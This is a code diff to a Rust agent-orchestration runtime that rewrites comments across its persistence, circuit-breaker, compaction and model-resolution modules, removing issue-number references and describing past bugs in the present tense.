@@ -280,12 +280,11 @@ pub(crate) fn stage_status_from(status: &AgentStatus) -> StageRunStatus {
 
 /// The stringified region kind used in snapshots and by the blueprint API.
 ///
-/// One word per kind, and it is the word the blueprint's own TOML uses. It used
-/// to be a third spelling of its own - `sliding` for a `sliding_window`,
-/// `history` for a `compact_history` - which meant a console reading a context
-/// snapshot and a console reading a blueprint disagreed about what the same
-/// region was. Snapshots written by an older build still carry the old two
-/// words, so a reader that renders kinds should accept both.
+/// One word per kind, and it is the word the blueprint's own TOML uses, so a
+/// console reading a context snapshot and a console reading a blueprint agree
+/// about what the same region is. Snapshots written by an older build carry a
+/// third spelling for two of them - `sliding` for a `sliding_window`, `history`
+/// for a `compact_history` - so a reader that renders kinds should accept both.
 pub fn region_kind_str(kind: &RegionKind) -> &'static str {
     match kind {
         RegionKind::Pinned => "pinned",
@@ -569,7 +568,7 @@ mod tests {
         // A blueprint with no stages at all offers nothing.
         assert!(no_output_tools(vec![]));
         // Read-only, and the sub-agent tools a router would use: nothing the
-        // framework tracks as a file change. This is the issue #192 case.
+        // framework tracks as a file change.
         assert!(no_output_tools(vec![stage_with(
             &["read_file", "spawn_agent", "context_write"],
             None
@@ -965,7 +964,7 @@ mod tests {
         assert!(!running.flags.empty_output);
         assert_eq!(running.flags.gates_forced, 2);
 
-        // Finished with nothing written: that is the #107 signature.
+        // Finished with nothing written: the empty-output signature.
         for status in [
             AgentStatus::Complete,
             AgentStatus::Cancelled,
@@ -1019,7 +1018,7 @@ mod tests {
         assert_eq!(meta.flags.modified_files, vec!["src/a.rs".to_string()]);
 
         // Finished having written nothing, with nothing to write *with*: the
-        // framework has no basis to call this empty, so it doesn't (issue #192).
+        // framework has no basis to call this empty, so it doesn't.
         let mut incapable = RunOutcomeFlags::default();
         incapable.0.no_output_tools = true;
         let meta = build_run_meta(

--- a/crates/leviath-runtime/src/persistence_bridge.rs
+++ b/crates/leviath-runtime/src/persistence_bridge.rs
@@ -64,7 +64,7 @@ pub(crate) enum PersistMsg {
     Snapshot(Box<PersistJob>),
     /// Append one journal record to `<runs_dir>/<run_id>/run.lvr` - how a tool
     /// batch's dispatch and per-call completions reach the archive between
-    /// snapshots (issue #96).
+    /// snapshots.
     Append {
         /// The run id (its directory name under the runs dir).
         run_id: String,
@@ -79,8 +79,8 @@ pub(crate) enum PersistMsg {
     },
     /// Buffered per-stage output/log lines with nothing else to report. The
     /// dispatch system sends this instead of a full [`PersistMsg::Snapshot`]
-    /// when lines were buffered but the run's watermark did not move - tool
-    /// activity between iterations used to force a whole-window snapshot
+    /// when lines were buffered but the run's watermark did not move, so tool
+    /// activity between iterations does not force a whole-window snapshot
     /// (context deep-clone, meta/context rewrite, archive record) per batch of
     /// log lines, several times per iteration.
     StageLines {
@@ -132,7 +132,7 @@ pub(crate) async fn persistence_worker(
     // This lives here rather than with the sender because the sender cannot
     // know whether a job it built was written: the coalescing below drops
     // superseded snapshots, and a watermark advanced on the dropped one leaves
-    // the descriptor in `meta.json` with no sidecar beside it (issue #276).
+    // the descriptor in `meta.json` with no sidecar beside it.
     // Here the skip is decided after that, so it reflects what is on disk.
     let mut last_output: std::collections::HashMap<String, (i64, usize)> =
         std::collections::HashMap::new();
@@ -427,7 +427,7 @@ struct WriteOutcome {
     /// landed is unrecoverable: every later diff is then relative to a state no
     /// reader can reconstruct, so the folded archive drifts from the run for
     /// the rest of its life - while `context.json`, written whole each time,
-    /// stays correct. One swallowed append error was enough (issue #455).
+    /// stays correct. One swallowed append error is enough.
     archived: bool,
 }
 
@@ -473,7 +473,7 @@ async fn write_snapshot(
     // heartbeat does not rewrite an unchanged quarter-megabyte file every
     // thirty seconds. The check is here rather than at the sender because only
     // the lane knows a job survived coalescing to be written at all - deciding
-    // it earlier is what left descriptors without sidecars (issue #276).
+    // it earlier is what leaves descriptors without sidecars.
     let submitted = job
         .meta
         .final_output
@@ -735,13 +735,13 @@ mod tests {
         }
     }
 
-    /// The whole loop, end to end, for issue #276: two snapshots for one run in
-    /// a single batch, both describing and carrying the answer.
+    /// The whole loop, end to end: two snapshots for one run in a single batch,
+    /// both describing and carrying the answer.
     ///
-    /// The first is dropped as superseded - which is exactly the coalescing that
-    /// used to lose the bytes, because the sender had already marked them sent.
-    /// The surviving snapshot must still produce the sidecar, and the second
-    /// batch (a heartbeat re-sending the same answer) must not rewrite it.
+    /// The first is dropped as superseded, and that coalescing loses the bytes
+    /// if the sender has already marked them sent. The surviving snapshot must
+    /// still produce the sidecar, and the second batch (a heartbeat re-sending
+    /// the same answer) must not rewrite it.
     #[tokio::test]
     async fn worker_writes_the_sidecar_even_when_the_first_snapshot_is_coalesced_away() {
         let dir = tempfile::tempdir().unwrap();
@@ -926,13 +926,14 @@ mod tests {
         assert_eq!(written, "metric,value\nrows,2\n");
     }
 
-    /// The regression for issue #276: a descriptor must never reach `meta.json`
-    /// without its sidecar landing too.
+    /// A descriptor must never reach `meta.json` without its sidecar landing
+    /// too.
     ///
-    /// The failure was not in either write - it was in deciding *earlier* than
-    /// the write whether the bytes were needed. The sender advanced a watermark
-    /// when it built the job; the lane then dropped that job as superseded and
-    /// wrote a later one, which described the answer and carried nothing. Here
+    /// The hazard is not in either write, it is in deciding *earlier* than the
+    /// write whether the bytes are needed. A sender that advances a watermark
+    /// when it builds the job loses them when the lane drops that job as
+    /// superseded and writes a later one, which describes the answer and
+    /// carries nothing. Here
     /// the second job is written with `written_output: None` - the honest state
     /// after the first was dropped - and must still produce the sidecar.
     #[tokio::test]
@@ -1441,9 +1442,10 @@ mod tests {
         // The run establishes its directory the ordinary way. The lane handles
         // messages in order and an append carries an ack, so an acked append
         // sent after the snapshot is a barrier: when it answers, the snapshot
-        // is entirely on disk. This used to poll for `meta.json` alone, and
-        // `remove_dir_all` below then raced the lane still writing the rest
-        // of the snapshot beside it - `DirectoryNotEmpty` on a macOS runner.
+        // is entirely on disk. Polling for `meta.json` alone is not enough:
+        // `remove_dir_all` below then races the lane still writing the rest of
+        // the snapshot beside it, which is `DirectoryNotEmpty` on a macOS
+        // runner.
         tx.send(PersistMsg::Snapshot(Box::new(job("run-1"))))
             .unwrap();
         let (settled_tx, settled_rx) = tokio::sync::oneshot::channel();
@@ -1465,7 +1467,8 @@ mod tests {
         std::fs::remove_dir_all(&run_dir).unwrap();
 
         // Every later message for it is dropped - a snapshot, a journal append,
-        // and a batch of stage lines, since all three used to make directories.
+        // and a batch of stage lines, since all three would otherwise create
+        // the directory again.
         tx.send(PersistMsg::Snapshot(Box::new(job("run-1"))))
             .unwrap();
         let (ack_tx, ack_rx) = tokio::sync::oneshot::channel();
@@ -1870,7 +1873,7 @@ mod tests {
     /// Advancing that digest for a record that never landed is unrecoverable:
     /// every later delta is then relative to a state no reader can rebuild, so
     /// the folded archive drifts from the run for the rest of its life while
-    /// `context.json` - written whole each time - stays correct (issue #455).
+    /// `context.json` - written whole each time - stays correct.
     ///
     /// A directory where `run.lvr` should be is the cheapest real append
     /// failure: the open fails, the rest of the write still succeeds.
@@ -1961,10 +1964,10 @@ mod tests {
     /// A run's terminal transition is recorded as an event, not left to be
     /// inferred by diffing metadata between records.
     ///
-    /// Issue #456 asked for this from the post-mortem side: the journals of 31
-    /// runs that died on an empty account carried no statement of when or to
-    /// what, so working it out meant correlating daemon logs that a harness
-    /// had sent to /dev/null.
+    /// The post-mortem side is what needs it: without the record, a journal
+    /// carries no statement of when a run went terminal or to what, so working
+    /// it out means correlating daemon logs a harness may have sent to
+    /// /dev/null.
     #[tokio::test]
     async fn a_change_of_status_is_journalled_as_its_own_record() {
         let dir = tempfile::tempdir().unwrap();

--- a/crates/leviath-runtime/src/pipeline/calibration.rs
+++ b/crates/leviath-runtime/src/pipeline/calibration.rs
@@ -32,12 +32,12 @@
 //!   of them drift. Until a call is observed costing more, the arithmetic is
 //!   exactly what it was.
 //!
-//! Issue #485: a 27B model pinned to `num_ctx 32768` assembled 32,497 real
-//! tokens on a Python-heavy corpus while the estimator believed it was inside
-//! the region budgets. The next call appended three more read results, crossed
-//! the window, and Ollama front-truncated from the start - taking the last user
-//! turn with it and answering `no user query found in messages`, which names
-//! neither the size nor the truncation.
+//! The failure this exists for: a 27B model pinned to `num_ctx 32768` assembles
+//! 32,497 real tokens on a Python-heavy corpus while the estimator believes it
+//! is inside the region budgets. The next call appends three more read results,
+//! crosses the window, and Ollama front-truncates from the start - taking the
+//! last user turn with it and answering `no user query found in messages`,
+//! which names neither the size nor the truncation.
 
 use bevy_ecs::prelude::Component;
 
@@ -122,8 +122,8 @@ impl PromptCalibration {
 
 /// The correction for an agent that may not have been calibrated yet.
 ///
-/// Absent means an agent spawned before this existed, or one in a test that
-/// builds its components by hand. Both should behave exactly as they did.
+/// Absent means an agent that has not dispatched a measured call yet, or one
+/// in a test that builds its components by hand. Both take no correction.
 pub(crate) fn shortfall_of(calibration: Option<&PromptCalibration>) -> usize {
     calibration.map_or(0, PromptCalibration::shortfall)
 }

--- a/crates/leviath-runtime/src/pipeline/circuit.rs
+++ b/crates/leviath-runtime/src/pipeline/circuit.rs
@@ -3,9 +3,9 @@
 //!
 //! Failing over (see [`super::response::collect_inference`]) rescues one run.
 //! It does nothing for the *next* run, which starts on the same dead provider
-//! and burns its own failure discovering the same thing. Issue #201 is what
-//! that looks like at scale: ten consecutive workers, every one of them dying
-//! at iteration 0 against an OpenRouter account with no credits left.
+//! and burns its own failure discovering the same thing. At scale that is ten
+//! consecutive workers, every one of them dying at iteration 0 against an
+//! OpenRouter account with no credits left.
 //!
 //! So failures are counted per provider. Past a threshold the circuit opens and
 //! dispatch stops choosing that provider at all, which turns a silent stream of
@@ -180,7 +180,7 @@ impl ProviderCircuits {
     ///
     /// The stall watchdog asks this to tell "out of credits" apart from the
     /// other ways a provider leaves service: the former pauses the run for a
-    /// resume instead of failing it (issue #413).
+    /// resume instead of failing it.
     pub(crate) fn last_reason(&self, provider: &str) -> Option<UnavailableReason> {
         self.0.get(provider).map(|c| c.reason)
     }
@@ -500,7 +500,7 @@ mod tests {
     #[test]
     fn reset_forgets_every_circuit() {
         // What an explicit resume relies on: after a reset the next dispatch
-        // is a real probe rather than a wait for the cooldown (issue #413).
+        // is a real probe rather than a wait for the cooldown.
         let mut circuits = ProviderCircuits::default();
         let mut now = 0;
         while !fail(&mut circuits, now) {
@@ -768,7 +768,8 @@ mod tests {
 
     #[test]
     fn rotation_is_a_no_op_without_the_breaker_installed() {
-        // An embedder that never inserts the resource keeps the old behavior.
+        // No `ProviderCircuits` resource, so the stage keeps the provider it
+        // was given: an embedder that never inserts one gets no rotation.
         let mut world = World::new();
         let e = world
             .spawn((

--- a/crates/leviath-runtime/src/pipeline/compaction.rs
+++ b/crates/leviath-runtime/src/pipeline/compaction.rs
@@ -97,7 +97,7 @@ pub(crate) fn dispatch_compaction(
         // Against the corrected estimate, not the raw one. The threshold is
         // there to leave room between "nearly full" and "over the window", and
         // an estimate measured running light spends that room without ever
-        // reporting it (issue #485).
+        // reporting it.
         if !crate::pipeline::needs_eviction_calibrated(
             window.current_tokens,
             window.max_tokens,
@@ -215,9 +215,9 @@ pub(crate) fn collect_compaction(
         // Billed to the stage the run was in when the window filled up, the same
         // way its own turns are. Compaction is not free and not incidental - a
         // stage that compacts twice can spend more on summarizing its context
-        // than on the work - so leaving it out of the ledger left the one
-        // question the ledger exists to answer, which stage cost that,
-        // answerable only for the cheap half of the bill (#630).
+        // than on the work - so leaving it out of the ledger would leave the
+        // one question the ledger exists to answer, which stage cost that,
+        // answerable only for the cheap half of the bill.
         for usage in &outcome.usage {
             crate::inference_usage::record_call(
                 totals.as_deref_mut(),
@@ -241,9 +241,9 @@ pub(crate) fn collect_compaction(
                 // one that found nothing worth keeping - and writing it would
                 // trade the region's real contents for a blank. Measured on a
                 // 32k window, where the transcript being summarized was small
-                // enough that the model returned an empty string; the blank was
-                // stored and later reached a provider as a zero-length turn,
-                // which is a 400 (issue #495). Leave the region as written and
+                // enough that the model returned an empty string; a stored
+                // blank reaches a provider as a zero-length turn, which is a
+                // 400. Leave the region as written and
                 // say so: eviction has other phases, and losing the content is
                 // worse than staying over budget for another tick.
                 if summary.trim().is_empty() {
@@ -354,7 +354,7 @@ pub(crate) fn apply_edge_transform(
         }
         // Kind cannot tell a transcript from a table of results, so a region
         // whose author said its content does not survive a paraphrase is left
-        // alone however the edge is spelled (#369).
+        // alone however the edge is spelled.
         EdgeTransform::Compact { .. } => window
             .regions
             .iter()
@@ -439,7 +439,7 @@ pub(crate) fn dispatch_edge_compact(
         // transform that quietly does nothing is a transform that behaves
         // differently on different runs of the same blueprint, with no signal
         // either way - and the un-compacted run looks identical to a compacted
-        // one from outside (#369).
+        // one from outside.
         let started = settings
             .and_then(|s| {
                 let config = &s.0;

--- a/crates/leviath-runtime/src/pipeline/gate_check.rs
+++ b/crates/leviath-runtime/src/pipeline/gate_check.rs
@@ -99,7 +99,7 @@ pub(crate) fn gate_blocks(
     // Conjunctive, and checked before `require_modifications` so it holds
     // whatever else the gate asks for. `gate.region` below is one of several
     // *alternative* ways to satisfy `require_modifications`, which is why it
-    // cannot express "do not leave without writing this" (#371).
+    // cannot express "do not leave without writing this".
     let missing: Vec<&str> = gate
         .require_regions
         .iter()

--- a/crates/leviath-runtime/src/pipeline/hooks.rs
+++ b/crates/leviath-runtime/src/pipeline/hooks.rs
@@ -1,4 +1,4 @@
-//! Running a stage's script hooks (issue #260).
+//! Running a stage's script hooks.
 //!
 //! The contract lives in [`leviath_scripting::stage_hook`]; this module is the
 //! pipeline half - when each hook fires, what the script is shown, and what

--- a/crates/leviath-runtime/src/pipeline/inference.rs
+++ b/crates/leviath-runtime/src/pipeline/inference.rs
@@ -95,11 +95,11 @@ pub(crate) fn hint_blocks(
 ///
 /// Providers reject a request whose completion budget is below one - OpenAI
 /// with `Invalid 'max_completion_tokens': integer below minimum value`,
-/// Anthropic likewise - and the runtime derived that budget by subtracting the
-/// prompt from the window with no floor under it. On a tight pinned window a
-/// prompt that reached the ceiling drove it to zero and the request went out
-/// anyway. A 400 does not read as transient, so the retry loop resent the same
-/// doomed request until the run died (issue #495).
+/// Anthropic likewise - and the budget is derived by subtracting the prompt
+/// from the window. With no floor under it, a tight pinned window whose prompt
+/// reaches the ceiling drives it to zero and the request goes out anyway. A 400
+/// does not read as transient, so the retry loop resends the same doomed
+/// request until the run dies.
 ///
 /// Deliberately one, and not something roomier. The budget is also capped at
 /// what the window has left, because a provider rejects `prompt + completion`
@@ -146,7 +146,7 @@ pub(crate) struct PriorCalls {
     /// Per-block digests, empty before the first request.
     pub(crate) block_hashes: Vec<u64>,
     /// How far the estimate ran under what the provider charged, or `None`
-    /// before anything was measured (issue #485).
+    /// before anything was measured.
     pub(crate) calibration: Option<crate::pipeline::PromptCalibration>,
     /// A reply in this stage was cut off at the output cap, so the cap goes
     /// out at the model's maximum instead of the stage's setting.
@@ -360,7 +360,7 @@ pub(crate) struct SystemPrefixHash(pub u64);
 
 /// The previous request's per-block system digests, kept on the agent so the
 /// next assembly can tell which blocks held still and place cache breakpoints
-/// only where the entry is readable back (issue #474).
+/// only where the entry is readable back.
 #[derive(Component, Debug, Clone, Default)]
 pub(crate) struct SystemBlockHashes(pub Vec<u64>);
 
@@ -387,7 +387,7 @@ pub(crate) fn dispatch_inference(
     // the thread-local `tick_scope` can't carry an entity back to the catcher.
     // Each agent's share runs under `run_agent_parallel`, which catches there -
     // where the entity is known - and marks that agent for `tick` to fail
-    // (issue #109). Clearing the thread-local keeps a panic in the fan-out
+    // Clearing the thread-local keeps a panic in the fan-out
     // machinery *itself* unattributed rather than blamed on whichever agent a
     // previous system left recorded.
     crate::tick_scope::clear();
@@ -417,7 +417,7 @@ pub(crate) fn dispatch_inference(
                 }
                 // Every decline below records why and since when, so the
                 // watchdog can tell a run that is waiting from one that is
-                // waiting for something that will never happen (issue #190).
+                // waiting for something that will never happen.
                 let stall = |reason| {
                     let noted = note_stall(stalled, reason, now);
                     par_commands.command_scope(|mut commands| {
@@ -428,7 +428,7 @@ pub(crate) fn dispatch_inference(
                 // provider still standing. Reaching a tripped one here means
                 // every candidate is out of service, so park rather than send
                 // a request that is going to fail the same way as the last
-                // three (issue #201). The stall watchdog ends the wait.
+                // three. The stall watchdog ends the wait.
                 if circuits.is_some_and(|c| c.is_open(&si.provider_name, now, &circuit_policy)) {
                     tracing::debug!(
                         provider = %si.provider_name,
@@ -484,13 +484,13 @@ pub(crate) fn dispatch_inference(
                     // What the window believes this call will cost. The response
                     // says what it really cost, and the two together are the
                     // only measurement of the estimator's drift the runtime
-                    // gets (issue #485).
+                    // gets.
                     commands
                         .entity(entity)
                         .insert(crate::pipeline::PromptEstimate(window.current_tokens));
                 });
                 // A provider that does not advertise streaming for this model
-                // is called the old way whatever the config says: `infer_stream`
+                // is called non-streaming whatever the config says: `infer_stream`
                 // has a default that buffers and then emits one chunk, so
                 // asking anyway would pay for the fold and gain nothing.
                 let stream =

--- a/crates/leviath-runtime/src/pipeline/mod.rs
+++ b/crates/leviath-runtime/src/pipeline/mod.rs
@@ -209,7 +209,7 @@ pub struct StageInference {
     pub tool_filter: Option<Vec<String>>,
     /// Providers to fail over to, best first, when the current one turns out
     /// to be unusable. Consumed from the front by `collect_inference`, so an
-    /// exhausted list means "nowhere left to go" (issue #201).
+    /// exhausted list means "nowhere left to go".
     pub fallbacks: Vec<leviath_core::blueprint::ModelEntry>,
     /// The output shape resolved for this stage, carried alongside the tools it
     /// was already folded into. Dispatch reads it to know which format label to

--- a/crates/leviath-runtime/src/pipeline/persist.rs
+++ b/crates/leviath-runtime/src/pipeline/persist.rs
@@ -48,24 +48,23 @@ pub struct PersistWatermark {
     ///
     /// `last_written_at` cannot answer that: the heartbeat advances it whether
     /// or not anything happened, which is the whole point of the heartbeat and
-    /// exactly why `meta.json`'s `updated_at` is not evidence of progress. Issue
-    /// #184 was reported on the strength of a fresh `updated_at`, so this is the
-    /// timestamp `lev ps` ages its rows against.
+    /// exactly why `meta.json`'s `updated_at` is not evidence of progress: a
+    /// wedged run keeps a fresh one. This is the timestamp `lev ps` ages its
+    /// rows against.
     last_progress_at: Option<i64>,
     /// The taint audit already on disk, as `(stage index, event count)`.
     ///
     /// The audit file is only rewritten when the gate recorded a new event.
-    /// Without it every snapshot re-serialized the whole (append-only) log,
-    /// an O(events) allocation per tick that grew with the run.
+    /// Without it every snapshot re-serializes the whole (append-only) log,
+    /// an O(events) allocation per tick that grows with the run.
     last_taint: Option<(usize, usize)>,
     /// The run's `(title, title_error)` as of the last snapshot.
     ///
     /// A title arrives on its own schedule: it is generated beside the run's
     /// first turn and can land after the run's last move, changing nothing
-    /// [`Self::last`] tracks. Without this it would sit in memory until the
-    /// next heartbeat - which a finished run is unloaded before reaching, so
-    /// the name was simply lost. Compared by reference below; only a write
-    /// clones.
+    /// [`Self::last`] tracks. Without this it sits in memory until the next
+    /// heartbeat, which a finished run is unloaded before reaching, and the
+    /// name is lost. Compared by reference below; only a write clones.
     last_title: Option<(Option<String>, Option<String>)>,
 }
 
@@ -232,13 +231,13 @@ fn credit_wait_to_stage_clock(progress: &mut StageProgress, now: i64) {
 /// [`Skipped`](leviath_core::run_meta::StageRunStatus::Skipped) once the run is
 /// over.
 ///
-/// Position used to stand in for "has run", which is only true of a linear
+/// Position cannot stand in for "has run": that only holds for a linear
 /// blueprint. A graph reaches its stages in whatever order its edges describe,
-/// so every branch the run went past without taking was filed as `Complete`
+/// so a branch the run went past without taking would be filed as `Complete`
 /// with an empty `region_tokens` - and since that map holds the high-water mark
 /// each region reached rather than what the stage itself added, an empty one in
-/// the middle of the sequence made the next real stage appear to have written
-/// every region from nothing (#372).
+/// the middle of the sequence makes the next real stage look like it wrote
+/// every region from nothing.
 ///
 /// `started_at`/`ended_at` are stamped once and never overwritten, so repeated
 /// calls are idempotent.
@@ -461,7 +460,7 @@ pub(crate) fn dispatch_persistence(
         let watermark_changed = watermark.last.as_ref() != Some(&current);
         // Deliberately *not* folded into `current`: a title is not the agent
         // moving, so it must not advance `last_progress_at` and make a wedged
-        // run look alive (issue #184). It only earns a write.
+        // run look alive. It only earns a write.
         let title_now = (md.title.as_deref(), md.title_error.as_deref());
         let title_changed = watermark
             .last_title
@@ -583,7 +582,7 @@ pub(crate) fn dispatch_persistence(
             .map(|w| serde_json::to_string(&w.to_state()).expect("FanOutState always serializes"));
         // An agent parked at a stage-boundary interaction point: persist the open
         // point (cursor/round + the reviewed document) so a restart re-presents the
-        // same prompt rather than dropping it and re-inferring (issue #38). The
+        // same prompt rather than dropping it and re-inferring. The
         // document comes from the open request in the hub - which is present by the
         // time `reflect_interaction_status` (running just before this system) has
         // flipped the agent to `Waiting`. If the request isn't registered yet, skip
@@ -604,21 +603,20 @@ pub(crate) fn dispatch_persistence(
         // Always carry the answer's bytes when the agent holds them; the
         // persistence lane decides whether they still need writing.
         //
-        // This used to be skipped here, keyed on a watermark advanced when the
-        // job was *built*. That assumed every job it built would be written,
-        // and the lane explicitly does not promise that: it coalesces queued
-        // snapshots per run and keeps only the newest. A run that finished
-        // inside one persistence window therefore had the job carrying the body
-        // dropped as superseded, while every later job carried `None` and still
-        // rewrote `meta.json` with the descriptor - leaving the descriptor and
-        // the sidecar permanently disagreeing, which `read_final_output` reads
-        // as "no answer" (issue #276).
+        // Skipping here on a watermark advanced when the job is *built* would
+        // assume every job built gets written, and the lane does not promise
+        // that: it coalesces queued snapshots per run and keeps only the
+        // newest. A run that finishes inside one persistence window would have
+        // the job carrying the body dropped as superseded, while every later
+        // job carries `None` and still rewrites `meta.json` with the
+        // descriptor - leaving the descriptor and the sidecar permanently
+        // disagreeing, which `read_final_output` reads as "no answer".
         //
-        // The skip itself was worth keeping - it stops a heartbeat rewriting a
-        // quarter-megabyte file every thirty seconds - so it moved to the lane,
-        // past the coalescing, where "did this get written" is a fact rather
-        // than an assumption. The cost here is one clone of the answer per
-        // snapshot, on a path that already deep-clones the whole context window.
+        // The skip lives in the lane instead, past the coalescing, where "did
+        // this get written" is a fact rather than an assumption; it stops a
+        // heartbeat rewriting a quarter-megabyte file every thirty seconds.
+        // The cost here is one clone of the answer per snapshot, on a path
+        // that already deep-clones the whole context window.
         let final_output_body = final_output.map(|o| o.0.content.clone());
         let _ = stage.0.send(PersistMsg::Snapshot(Box::new(PersistJob {
             run_id: md.run_id.clone(),

--- a/crates/leviath-runtime/src/pipeline/requirements.rs
+++ b/crates/leviath-runtime/src/pipeline/requirements.rs
@@ -222,10 +222,9 @@ pub(crate) fn require_context_regions(
                 "required context regions still empty after re-run attempts; proceeding"
             );
             // Recorded as well as logged. A log line is not readable after the
-            // fact, so "the agent wrote its plan" and "we asked twice and moved
-            // on" both finished `complete` and nothing downstream could tell
-            // them apart - which is how this went unnoticed across four
-            // benchmark rounds (#371).
+            // fact, so without this "the agent wrote its plan" and "we asked
+            // twice and moved on" both finish `complete` and nothing
+            // downstream can tell them apart.
             if let Some(mut flags) = flags {
                 for name in &names {
                     if !flags

--- a/crates/leviath-runtime/src/pipeline/resolve.rs
+++ b/crates/leviath-runtime/src/pipeline/resolve.rs
@@ -2,10 +2,10 @@
 //! [`ModelConfig`] and `available_tools` into concrete [`ResolvedStage`]s
 //! against whatever providers and tools the host actually has.
 //!
-//! Lives in the runtime (rather than the CLI daemon, where it started) so an
-//! embedding host resolves stages exactly the way `lev run` does. The one
-//! policy input the CLI used to read from its config file - the user's default
-//! provider/model - arrives as a plain [`ModelDefaults`] value instead.
+//! Lives in the runtime rather than the CLI daemon so an embedding host
+//! resolves stages exactly the way `lev run` does. The one policy input that
+//! comes from the CLI's config file - the user's default provider/model -
+//! arrives as a plain [`ModelDefaults`] value.
 
 use leviath_core::Blueprint;
 use leviath_core::blueprint::{ModelConfig, ModelEntry};
@@ -28,9 +28,9 @@ pub struct ModelDefaults {
     ///
     /// Appended after a stage's own entries and the user default, so a
     /// blueprint that names exactly one model still has somewhere to go when
-    /// that provider stops answering. This is the case issue #201 reported:
-    /// every stage named a single OpenRouter model, so there was nothing to
-    /// fall back to when the account ran out of credits.
+    /// that provider stops answering. The case it covers: every stage names a
+    /// single OpenRouter model, so there is nothing to fall back to when the
+    /// account runs out of credits.
     pub fallback_order: Vec<ModelEntry>,
 }
 
@@ -38,8 +38,7 @@ pub struct ModelDefaults {
 /// the registered providers. Honors a `--model` override (`provider/model` or a
 /// bare `model`), otherwise picks the first listed model whose provider is
 /// registered, then falls back to the user default (when `allow_user_default`),
-/// and finally to the config's first listed entry. (Ported from the executor's
-/// inline resolution.)
+/// and finally to the config's first listed entry.
 pub fn resolve_stage_model(
     model_cfg: &ModelConfig,
     model_override: Option<&str>,
@@ -56,10 +55,10 @@ pub fn resolve_stage_model(
 /// Every provider/model this stage may run on, best first.
 ///
 /// [`resolve_stage_model`] is this list's head. The tail is what the runtime
-/// fails over to when a provider turns out to be unusable mid-run: the ordered
-/// list in `ModelConfig.models` was only ever consulted for *registration* at
-/// spawn time, so a provider that was configured but out of credits was picked
-/// and then never abandoned (issue #201).
+/// fails over to when a provider turns out to be unusable mid-run. Consult the
+/// ordered list in `ModelConfig.models` only for *registration* at spawn time
+/// and a provider that is configured but out of credits gets picked and then
+/// never abandoned.
 ///
 /// Order: the stage's own registered entries, then the user default, then the
 /// host-wide `fallback_order`. Deduplicated, because the same pair reaching the
@@ -70,17 +69,17 @@ pub fn resolve_stage_model(
 /// The same model is spelled differently depending on the provider serving it:
 /// `gpt-5.5` on OpenAI is `openai/gpt-5.5` on OpenRouter, and
 /// `claude-opus-5` is `anthropic/claude-opus-5`. Comparing the raw strings
-/// makes one model look like two, which is what let a route preference be read
-/// as a model preference (issue #578).
+/// makes one model look like two, which is what lets a route preference be read
+/// as a model preference.
 ///
 /// The last segment is the model; anything before it is the vendor namespace a
 /// gateway prefixes. A local model with no slash (`qwen3.5:9b`) is already its
 /// own key.
 ///
 /// Public because every layer that compares two model names has to compare them
-/// the same way. `lev validate` and the provider registry both grew their own
-/// copy of this rule, and three copies of "what counts as the same model" would
-/// not have stayed equal.
+/// the same way: `lev validate` and the provider registry call this rather than
+/// each keeping a copy of "what counts as the same model", which would not stay
+/// equal.
 pub fn model_key(model: &str) -> &str {
     model.rsplit('/').next().unwrap_or(model)
 }
@@ -191,9 +190,9 @@ pub(crate) fn resolve_stage_candidates(
         let mut candidates_for_model = registry.native_providers();
         candidates_for_model.sort_by_key(|(name, _)| *name != defaults.provider);
         // A script provider is not in `native_providers` - it is compiled on
-        // demand rather than enumerated - so an open route could never land on
-        // one, and a local box serving one fast model was unreachable however
-        // the machine set `default_provider` (issue #598). The *default*
+        // demand rather than enumerated - so without this an open route can
+        // never land on one, and a local box serving one fast model is
+        // unreachable however the machine sets `default_provider`. The *default*
         // provider is asked as well, which costs one compile of a script this
         // machine has explicitly chosen, and leaves every other script on disk
         // untouched. Put first, because being the default is what it means.
@@ -255,7 +254,7 @@ pub(crate) fn resolve_stage_candidates(
         // run should go, which is a statement about routes; letting it reorder
         // across models turns it into a statement about which model to use, and
         // a blueprint that deliberately chose one per stage silently gets
-        // another (issue #578).
+        // another.
         //
         // Models keep blueprint order, except that the user's own
         // `default_model` leads - that IS a model preference, and someone who
@@ -478,11 +477,10 @@ pub(crate) fn filter_tools_by_available(all: &[Tool], available: &[String]) -> V
 /// MCP tools named without their server, matched to the qualified name when
 /// exactly one server offers them.
 ///
-/// MCP tools were advertised bare until they became `<server>__<tool>`, so a
-/// blueprint written against the old naming says `create_issue` where the tool
-/// is now `github__create_issue`. Left alone that grant matches nothing and the
-/// tool is silently not offered - the failure issue #454 was about, and not one
-/// worth introducing while fixing it.
+/// MCP tools are advertised as `<server>__<tool>`, so a blueprint written
+/// against bare names says `create_issue` where the tool is
+/// `github__create_issue`. Left alone that grant matches nothing and the tool
+/// is silently not offered.
 ///
 /// Three things keep this from doing harm:
 ///
@@ -491,8 +489,8 @@ pub(crate) fn filter_tools_by_available(all: &[Tool], available: &[String]) -> V
 ///   the grant.
 /// - It requires exactly one candidate. Two servers offering `create_issue`
 ///   leave the name unresolved, because it genuinely is ambiguous and the
-///   manifest has to say which - the old naming's silent "whichever registered
-///   first" is what is being removed, not reproduced.
+///   manifest has to say which. A silent "whichever registered first" is what
+///   qualified names exist to prevent.
 /// - It matches on the qualified shape, so `create_issue` finds
 ///   `github__create_issue` and not some unrelated tool ending in those
 ///   characters.
@@ -616,10 +614,10 @@ pub fn providers_tried(
 /// The last fallback in [`resolve_stage_model`] is unchecked - it hands back
 /// the blueprint's own first entry whether or not anything answers to that
 /// name, and a full `provider/model` override skips the registry outright. So
-/// a stage could resolve to a provider that does not exist, and the agent
-/// spawned anyway: `Active`, iteration 0, and unable to take a single turn for
-/// as long as the host lived (issue #190). Catching it here turns a silently
-/// wedged run into an error the caller sees.
+/// a stage can resolve to a provider that does not exist, and the agent spawns
+/// anyway: `Active`, iteration 0, unable to take a single turn for as long as
+/// the host lives. Catching it here turns a silently wedged run into an error
+/// the caller sees.
 ///
 /// `unattended` is the run's `--yolo` setting: it decides whether a stage's
 /// human-in-the-loop tools are advertised at all (see
@@ -791,12 +789,12 @@ mod tests {
         )
     }
 
-    /// The whole of issue #598: a stage naming a model with no provider resolves
-    /// to the script provider the machine named as its default.
+    /// A stage naming a model with no provider resolves to the script provider
+    /// the machine named as its default.
     ///
-    /// Before this, `native_providers` was the only thing asked and it does not
-    /// enumerate script providers, so a local box serving exactly the model the
-    /// blueprint asked for won nothing and the stage went elsewhere.
+    /// `native_providers` does not enumerate script providers, so asking it
+    /// alone sends the stage elsewhere even when a local box serves exactly
+    /// the model the blueprint asked for.
     #[tokio::test]
     async fn a_script_provider_named_as_default_wins_an_open_route() {
